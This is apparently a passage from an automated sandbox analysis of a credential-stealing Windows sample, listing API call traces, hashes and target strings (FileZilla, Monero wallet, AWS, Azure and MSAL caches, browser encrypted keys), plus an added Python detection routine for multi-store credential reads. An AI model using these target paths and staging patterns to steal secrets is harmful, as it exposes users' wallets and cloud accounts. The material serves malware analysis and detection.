                                        • lstrcat.KERNEL32(?,00000000), ref: 00A4D2D4
                                        • lstrcat.KERNEL32(?,00A61490), ref: 00A4D2E3
                                          • Part of subcall function 00A5A820: lstrlen.KERNEL32(00A44F05,?,?,00A44F05,00A60DDE), ref: 00A5A82B
                                          • Part of subcall function 00A5A820: lstrcpy.KERNEL32(00A60DDE,00000000), ref: 00A5A885
                                        • lstrlen.KERNEL32(?), ref: 00A4D32A
                                        • lstrlen.KERNEL32(?), ref: 00A4D339
                                          • Part of subcall function 00A5AA70: StrCmpCA.SHLWAPI(01609038,00A4A7A7,?,00A4A7A7,01609038), ref: 00A5AA8F
                                        • DeleteFileA.KERNEL32(00000000), ref: 00A4D3B4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                        • String ID:
                                        • API String ID: 1956182324-0
                                        • Opcode ID: ce088abe1787bee8ebcdc65a6e0c2a96410286ea73818114e53c3a308ba2c65d
                                        • Instruction ID: 6d1cdfea92528cca073fb18fece19d3c2996120b5cc74eebb9e7e6bb83240594
                                        • Opcode Fuzzy Hash: ce088abe1787bee8ebcdc65a6e0c2a96410286ea73818114e53c3a308ba2c65d
                                        • Instruction Fuzzy Hash: 5DE13371A10108ABDB04EBA0DE96FEE7778BF64302F504255F507B7091EE35AE09CB66
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0160D530,00000000,?,00A6144C,00000000,?,?), ref: 00A4CA6C
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00A4CA89
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00A4CA95
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A4CAA8
                                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00A4CAD9
                                        • StrStrA.SHLWAPI(?,0160D680,00A60B52), ref: 00A4CAF7
                                        • StrStrA.SHLWAPI(00000000,0160D608), ref: 00A4CB1E
                                        • StrStrA.SHLWAPI(?,0160DDC0,00000000,?,00A61458,00000000,?,00000000,00000000,?,01609008,00000000,?,00A61454,00000000,?), ref: 00A4CCA2
                                        • StrStrA.SHLWAPI(00000000,0160DCC0), ref: 00A4CCB9
                                          • Part of subcall function 00A4C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00A4C871
                                          • Part of subcall function 00A4C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00A4C87C
                                        • StrStrA.SHLWAPI(?,0160DCC0,00000000,?,00A6145C,00000000,?,00000000,01609018), ref: 00A4CD5A
                                        • StrStrA.SHLWAPI(00000000,016091C8), ref: 00A4CD71
                                          • Part of subcall function 00A4C820: lstrcat.KERNEL32(?,00A60B46), ref: 00A4C943
                                          • Part of subcall function 00A4C820: lstrcat.KERNEL32(?,00A60B47), ref: 00A4C957
                                          • Part of subcall function 00A4C820: lstrcat.KERNEL32(?,00A60B4E), ref: 00A4C978
                                        • lstrlen.KERNEL32(00000000), ref: 00A4CE44
                                        • CloseHandle.KERNEL32(00000000), ref: 00A4CE9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                        • String ID:
                                        • API String ID: 3744635739-3916222277
                                        • Opcode ID: 5e768593869e67dcceb00b237cacc86ed3ad6bd6f5fff56b8f7a93fe838e4975
                                        • Instruction ID: 669830d72fefa2c406c911aa21334539ecf1a49067daf53fb9aa1bdfa86a1a87
                                        • Opcode Fuzzy Hash: 5e768593869e67dcceb00b237cacc86ed3ad6bd6f5fff56b8f7a93fe838e4975
                                        • Instruction Fuzzy Hash: C5E10072A00108ABDB14EBA4DD96FEEB778BF64301F404259F50667191EF306A4ECF66
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                        • RegOpenKeyExA.ADVAPI32(00000000,0160B228,00000000,00020019,00000000,00A605B6), ref: 00A583A4
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00A58426
                                        • wsprintfA.USER32 ref: 00A58459
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00A5847B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00A5848C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00A58499
                                          • Part of subcall function 00A5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A5A7E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                                        • String ID: - $%s\%s$?
                                        • API String ID: 3246050789-3278919252
                                        • Opcode ID: 7d42233a91709efed043f3105421511192cb6aa61e4c847410fddfc4e6e3e2b2
                                        • Instruction ID: 0d58ce5a67f6b5a004b07e123bbe60c9f3f5bb1ae35e0e377eeb604ea4893f9c
                                        • Opcode Fuzzy Hash: 7d42233a91709efed043f3105421511192cb6aa61e4c847410fddfc4e6e3e2b2
                                        • Instruction Fuzzy Hash: 70812C71A1011CABEB24DB50CD91FEEB7B8FF18701F008699E509A6180DF756B89CFA5
                                        APIs
                                          • Part of subcall function 00A58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A58E0B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A54DB0
                                        • lstrcat.KERNEL32(?,\.azure\), ref: 00A54DCD
                                          • Part of subcall function 00A54910: wsprintfA.USER32 ref: 00A5492C
                                          • Part of subcall function 00A54910: FindFirstFileA.KERNEL32(?,?), ref: 00A54943
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A54E3C
                                        • lstrcat.KERNEL32(?,\.aws\), ref: 00A54E59
                                          • Part of subcall function 00A54910: StrCmpCA.SHLWAPI(?,00A60FDC), ref: 00A54971
                                          • Part of subcall function 00A54910: StrCmpCA.SHLWAPI(?,00A60FE0), ref: 00A54987
                                          • Part of subcall function 00A54910: FindNextFileA.KERNEL32(000000FF,?), ref: 00A54B7D
                                          • Part of subcall function 00A54910: FindClose.KERNEL32(000000FF), ref: 00A54B92
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A54EC8
                                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00A54EE5
                                          • Part of subcall function 00A54910: wsprintfA.USER32 ref: 00A549B0
                                          • Part of subcall function 00A54910: StrCmpCA.SHLWAPI(?,00A608D2), ref: 00A549C5
                                          • Part of subcall function 00A54910: wsprintfA.USER32 ref: 00A549E2
                                          • Part of subcall function 00A54910: PathMatchSpecA.SHLWAPI(?,?), ref: 00A54A1E
                                          • Part of subcall function 00A54910: lstrcat.KERNEL32(?,0160EAF0), ref: 00A54A4A
                                          • Part of subcall function 00A54910: lstrcat.KERNEL32(?,00A60FF8), ref: 00A54A5C
                                          • Part of subcall function 00A54910: lstrcat.KERNEL32(?,?), ref: 00A54A70
                                          • Part of subcall function 00A54910: lstrcat.KERNEL32(?,00A60FFC), ref: 00A54A82
                                          • Part of subcall function 00A54910: lstrcat.KERNEL32(?,?), ref: 00A54A96
                                          • Part of subcall function 00A54910: CopyFileA.KERNEL32(?,?,00000001), ref: 00A54AAC
                                          • Part of subcall function 00A54910: DeleteFileA.KERNEL32(?), ref: 00A54B31
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                        • API String ID: 949356159-974132213
                                        • Opcode ID: f82836021e36ce3d090cf00c6ecc03e0d34688a7d521a45ea78991ab66325754
                                        • Instruction ID: 23e6649aacf4dbebbb05ebbc744c4934b19368b773e9b60b2e6d8843a13263e4
                                        • Opcode Fuzzy Hash: f82836021e36ce3d090cf00c6ecc03e0d34688a7d521a45ea78991ab66325754
                                        • Instruction Fuzzy Hash: 5B4171BAA4020467DB10F770ED47FED7638BB64701F404994B689660C1FEB55BCD8BA2
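                                        Across the function records above the sample builds paths to several credential stores (\AppData\Roaming\FileZilla\recentservers.xml, \Monero\wallet.keys, \.aws\, \.azure\, \.IdentityService\, msal.cache) and, in the records that show CopyFileA followed by DeleteFileA, stages a copy before removing it. The following is an added example, not part of the report: a small triage routine that runs over file-access telemetry and flags a process that reads several of those stores without being one of their legitimate owners, and records any file it created and then deleted. The event shape, the regexes and the allow-list of expected reader images are this example's assumptions; the sample events are constructed.

```python
import re
from collections import defaultdict

# Path fragments taken from the String IDs and API arguments in the records above.
# How they surface in telemetry (backslashes, casing) is an assumption of this example.
CREDENTIAL_STORES = {
    "filezilla": re.compile(r"\\FileZilla\\recentservers\.xml$", re.I),
    "monero":    re.compile(r"\\Monero\\wallet\.keys$", re.I),
    "aws":       re.compile(r"\\\.aws\\", re.I),
    "azure":     re.compile(r"\\\.azure\\", re.I),
    "msal":      re.compile(r"\\\.IdentityService\\|\\msal\.cache$", re.I),
}

# Images that legitimately read their own store (illustrative allow-list, tune per estate).
EXPECTED_READERS = {
    "filezilla": {"filezilla.exe"},
    "monero":    {"monero-wallet-gui.exe", "monero-wallet-cli.exe"},
    "aws":       {"aws.exe", "python.exe"},
    "azure":     {"az.cmd", "python.exe"},
    "msal":      {"az.cmd", "python.exe", "powershell.exe", "code.exe"},
}

# Constructed Sysmon-style file events: pid, image, op (read|create|delete), path.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": "file.exe", "op": "read",   "path": r"C:\Users\u\AppData\Roaming\FileZilla\recentservers.xml"},
    {"pid": 4120, "image": "file.exe", "op": "create", "path": r"C:\Users\u\AppData\Local\Temp\tmp1.tmp"},
    {"pid": 4120, "image": "file.exe", "op": "read",   "path": r"C:\Users\u\.aws\credentials"},
    {"pid": 4120, "image": "file.exe", "op": "read",   "path": r"C:\Users\u\.azure\msal_token_cache.bin"},
    {"pid": 4120, "image": "file.exe", "op": "read",   "path": r"C:\Users\u\AppData\Local\.IdentityService\msal.cache"},
    {"pid": 4120, "image": "file.exe", "op": "delete", "path": r"C:\Users\u\AppData\Local\Temp\tmp1.tmp"},
    {"pid": 880,  "image": "filezilla.exe", "op": "read", "path": r"C:\Users\u\AppData\Roaming\FileZilla\recentservers.xml"},
    {"pid": 2210, "image": "python.exe",    "op": "read", "path": r"C:\Users\u\.aws\credentials"},
]


def classify(path):
    """Return the credential-store category a path belongs to, or None."""
    for name, rx in CREDENTIAL_STORES.items():
        if rx.search(path):
            return name
    return None


def analyse(events, min_stores=2):
    """Return {pid: record} for processes that read at least min_stores distinct
    stores they are not expected to read. Each record carries the image name,
    the set of stores touched, and files the process created and later deleted
    (the CopyFileA ... DeleteFileA staging pattern shown in the records above)."""
    per_pid = defaultdict(lambda: {"image": None, "stores": set(),
                                   "created": set(), "copied_then_deleted": []})
    for ev in events:
        rec = per_pid[ev["pid"]]
        rec["image"] = ev["image"]
        cat = classify(ev["path"])
        if cat and ev["image"].lower() not in EXPECTED_READERS[cat]:
            rec["stores"].add(cat)
        if ev["op"] == "create":
            rec["created"].add(ev["path"].lower())
        elif ev["op"] == "delete" and ev["path"].lower() in rec["created"]:
            rec["copied_then_deleted"].append(ev["path"])
    return {pid: r for pid, r in per_pid.items() if len(r["stores"]) >= min_stores}


if __name__ == "__main__":
    for pid, rec in analyse(SAMPLE_EVENTS).items():
        print(pid, rec["image"], sorted(rec["stores"]), rec["copied_then_deleted"])
```

                                        The threshold on distinct stores is what keeps a single legitimate reader (the FTP client opening its own config, a CLI reading its own profile) out of the result; a stealer touches many unrelated stores from one process in a short window, which no benign image does.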
                                        APIs
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00A5906C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateGlobalStream
                                        • String ID: image/jpeg
                                        • API String ID: 2244384528-3785015651
                                        • Opcode ID: 92af2171195ea5de5c83846ea80e952cf4b1f307dc563a205a8e77a97a469ece
                                        • Instruction ID: fe04fbb3aa90d691426fe8f050af0181c6e158ddf780e2355af02b26e86747f1
                                        • Opcode Fuzzy Hash: 92af2171195ea5de5c83846ea80e952cf4b1f307dc563a205a8e77a97a469ece
                                        • Instruction Fuzzy Hash: FF7110B5A10208EBDB04DFE4DD89FEEB7B8BF48301F108509F615AB294DB34A945CB65
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00A531C5
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00A5335D
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00A534EA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExecuteShell$lstrcpy
                                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                        • API String ID: 2507796910-3625054190
                                        • Opcode ID: 82451001e19b316d8a0a1ffcd1a5a6cff1e404c0ad5d8ddeeff830a687bf2c39
                                        • Instruction ID: a233998955c2cd42edd5f84515c2b7db6e4a588932ef16ef0ae6d1a07dbcc885
                                        • Opcode Fuzzy Hash: 82451001e19b316d8a0a1ffcd1a5a6cff1e404c0ad5d8ddeeff830a687bf2c39
                                        • Instruction Fuzzy Hash: 54120071A001189ADB05EBA0DE92FDEB778BF24301F504659F90676191EF742B4ECFA2
                                        APIs
                                          • Part of subcall function 00A5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A5A7E6
                                          • Part of subcall function 00A46280: InternetOpenA.WININET(00A60DFE,00000001,00000000,00000000,00000000), ref: 00A462E1
                                          • Part of subcall function 00A46280: StrCmpCA.SHLWAPI(?,0160E9B0), ref: 00A46303
                                          • Part of subcall function 00A46280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A46335
                                          • Part of subcall function 00A46280: HttpOpenRequestA.WININET(00000000,GET,?,0160E578,00000000,00000000,00400100,00000000), ref: 00A46385
                                          • Part of subcall function 00A46280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A463BF
                                          • Part of subcall function 00A46280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A463D1
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A55318
                                        • lstrlen.KERNEL32(00000000), ref: 00A5532F
                                          • Part of subcall function 00A58E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A58E52
                                        • StrStrA.SHLWAPI(00000000,00000000), ref: 00A55364
                                        • lstrlen.KERNEL32(00000000), ref: 00A55383
                                        • lstrlen.KERNEL32(00000000), ref: 00A553AE
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 3240024479-1526165396
                                        • Opcode ID: 2776578e54a7f4093624e8adc5831b2e0f75dbe00cb9307b9ed1dd3fba4ad65e
                                        • Instruction ID: 555bf1c331a810e3566a072fae3123771a87fd90e5c1df3caac9d12dc7a89808
                                        • Opcode Fuzzy Hash: 2776578e54a7f4093624e8adc5831b2e0f75dbe00cb9307b9ed1dd3fba4ad65e
                                        • Instruction Fuzzy Hash: 3F511F30A10148ABDB14FF70CE96AED7779BF60302F504118FD069A592EF346B4ACB62
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2001356338-0
                                        • Opcode ID: 76710e9f736bc5011808557b025540f0b4bbc58448c1a294f964b5c12655d9cf
                                        • Instruction ID: 4a3847bb8828337c0e3c74f44af0dff598c85a11b498e82865abeb16902329ca
                                        • Opcode Fuzzy Hash: 76710e9f736bc5011808557b025540f0b4bbc58448c1a294f964b5c12655d9cf
                                        • Instruction Fuzzy Hash: C8C1B6B5A002099BCB14EF60DD89FEE7778BF64305F004599F90AA7141EB74AA89CF91
                                        APIs
                                          • Part of subcall function 00A58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A58E0B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A542EC
                                        • lstrcat.KERNEL32(?,0160E218), ref: 00A5430B
                                        • lstrcat.KERNEL32(?,?), ref: 00A5431F
                                        • lstrcat.KERNEL32(?,0160D5A8), ref: 00A54333
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A58D90: GetFileAttributesA.KERNEL32(00000000,?,00A41B54,?,?,00A6564C,?,?,00A60E1F), ref: 00A58D9F
                                          • Part of subcall function 00A49CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00A49D39
                                          • Part of subcall function 00A499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A499EC
                                          • Part of subcall function 00A499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A49A11
                                          • Part of subcall function 00A499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00A49A31
                                          • Part of subcall function 00A499C0: ReadFile.KERNEL32(000000FF,?,00000000,00A4148F,00000000), ref: 00A49A5A
                                          • Part of subcall function 00A499C0: LocalFree.KERNEL32(00A4148F), ref: 00A49A90
                                          • Part of subcall function 00A499C0: CloseHandle.KERNEL32(000000FF), ref: 00A49A9A
                                          • Part of subcall function 00A593C0: GlobalAlloc.KERNEL32(00000000,00A543DD,00A543DD), ref: 00A593D3
                                        • StrStrA.SHLWAPI(?,0160E1D0), ref: 00A543F3
                                        • GlobalFree.KERNEL32(?), ref: 00A54512
                                          • Part of subcall function 00A49AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A44EEE,00000000,00000000), ref: 00A49AEF
                                          • Part of subcall function 00A49AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00A44EEE,00000000,?), ref: 00A49B01
                                          • Part of subcall function 00A49AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A44EEE,00000000,00000000), ref: 00A49B2A
                                          • Part of subcall function 00A49AC0: LocalFree.KERNEL32(?,?,?,?,00A44EEE,00000000,?), ref: 00A49B3F
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A544A3
                                        • StrCmpCA.SHLWAPI(?,00A608D1), ref: 00A544C0
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00A544D2
                                        • lstrcat.KERNEL32(00000000,?), ref: 00A544E5
                                        • lstrcat.KERNEL32(00000000,00A60FB8), ref: 00A544F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                        • String ID:
                                        • API String ID: 3541710228-0
                                        • Opcode ID: f109908e0082befe1fcf667978f777a690348c39025fc15b0a7a2c54d219fa1c
                                        • Instruction ID: 6f3ade72b017985ce4f2e3f1836f4dd86f9e4add1757a9c300cc88bb0185f507
                                        • Opcode Fuzzy Hash: f109908e0082befe1fcf667978f777a690348c39025fc15b0a7a2c54d219fa1c
                                        • Instruction Fuzzy Hash: 1B7158B6900208BBDB14EBB0DD85FEE7779BB88301F044599F605A7181EA34DB59CFA1
                                        APIs
                                          • Part of subcall function 00A412A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A412B4
                                          • Part of subcall function 00A412A0: RtlAllocateHeap.NTDLL(00000000), ref: 00A412BB
                                          • Part of subcall function 00A412A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00A412D7
                                          • Part of subcall function 00A412A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00A412F5
                                          • Part of subcall function 00A412A0: RegCloseKey.ADVAPI32(?), ref: 00A412FF
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A4134F
                                        • lstrlen.KERNEL32(?), ref: 00A4135C
                                        • lstrcat.KERNEL32(?,.keys), ref: 00A41377
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                          • Part of subcall function 00A58B60: GetSystemTime.KERNEL32(00A60E1A,0160A9C8,00A605AE,?,?,00A413F9,?,0000001A,00A60E1A,00000000,?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A58B86
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00A41465
                                          • Part of subcall function 00A5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A5A7E6
                                          • Part of subcall function 00A499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A499EC
                                          • Part of subcall function 00A499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A49A11
                                          • Part of subcall function 00A499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00A49A31
                                          • Part of subcall function 00A499C0: ReadFile.KERNEL32(000000FF,?,00000000,00A4148F,00000000), ref: 00A49A5A
                                          • Part of subcall function 00A499C0: LocalFree.KERNEL32(00A4148F), ref: 00A49A90
                                          • Part of subcall function 00A499C0: CloseHandle.KERNEL32(000000FF), ref: 00A49A9A
                                        • DeleteFileA.KERNEL32(00000000), ref: 00A414EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                        • API String ID: 3478931302-218353709
                                        • Opcode ID: aaf92ac861f9bdf8b32291fb727a8cd17b149e56d84671dee2cc82e2312faa31
                                        • Instruction ID: d3914d8e978b56fc049ecacd66ea72e954025d674420b1da6cfea8877dea27c0
                                        • Opcode Fuzzy Hash: aaf92ac861f9bdf8b32291fb727a8cd17b149e56d84671dee2cc82e2312faa31
                                        • Instruction Fuzzy Hash: DF5138B1E5011897CB15FB60DD92FED733CBF64701F404698B60A62081EE345B89CBA6
                                        APIs
                                          • Part of subcall function 00A472D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00A4733A
                                          • Part of subcall function 00A472D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00A473B1
                                          • Part of subcall function 00A472D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00A4740D
                                          • Part of subcall function 00A472D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00A47452
                                          • Part of subcall function 00A472D0: HeapFree.KERNEL32(00000000), ref: 00A47459
                                        • lstrcat.KERNEL32(00000000,00A617FC), ref: 00A47606
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00A47648
                                        • lstrcat.KERNEL32(00000000, : ), ref: 00A4765A
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00A4768F
                                        • lstrcat.KERNEL32(00000000,00A61804), ref: 00A476A0
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00A476D3
                                        • lstrcat.KERNEL32(00000000,00A61808), ref: 00A476ED
                                        • task.LIBCPMTD ref: 00A476FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                        • String ID: :
                                        • API String ID: 2677904052-3653984579
                                        • Opcode ID: f04908d0fc0f9f75ec589746489df026d773b82caa5cac95fe01ec4e3a6b9f27
                                        • Instruction ID: ec6bcf5da316f0944ad9b197ceca3f39e54b5796529e23a5d4b0fea1561400f1
                                        • Opcode Fuzzy Hash: f04908d0fc0f9f75ec589746489df026d773b82caa5cac95fe01ec4e3a6b9f27
                                        • Instruction Fuzzy Hash: 22318E75A00109EFDB04EBB4ED85FFF7779BB84301B144509F102A72A1EB38A946CB65
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0160E758,00000000,?,00A60E2C,00000000,?,00000000), ref: 00A58130
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A58137
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00A58158
                                        • __aulldiv.LIBCMT ref: 00A58172
                                        • __aulldiv.LIBCMT ref: 00A58180
                                        • wsprintfA.USER32 ref: 00A581AC
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                        • String ID: %d MB$@
                                        • API String ID: 2774356765-3474575989
                                        • Opcode ID: c35d052b0b5f94e9fc2229a6f5cd9e5f0f2f0c8bf4fcf6c0ccbcb656f6fa0e79
                                        • Instruction ID: 3aa9a55f62108bf39e06e881f923f74b45188f5b583b794d3b0991fb7453c9af
                                        • Opcode Fuzzy Hash: c35d052b0b5f94e9fc2229a6f5cd9e5f0f2f0c8bf4fcf6c0ccbcb656f6fa0e79
                                        • Instruction Fuzzy Hash: E2214DB1E44208ABEB10DFD4CD49FAFB7B8FB44B41F104609F605BB280D77859058BA9
                                        APIs
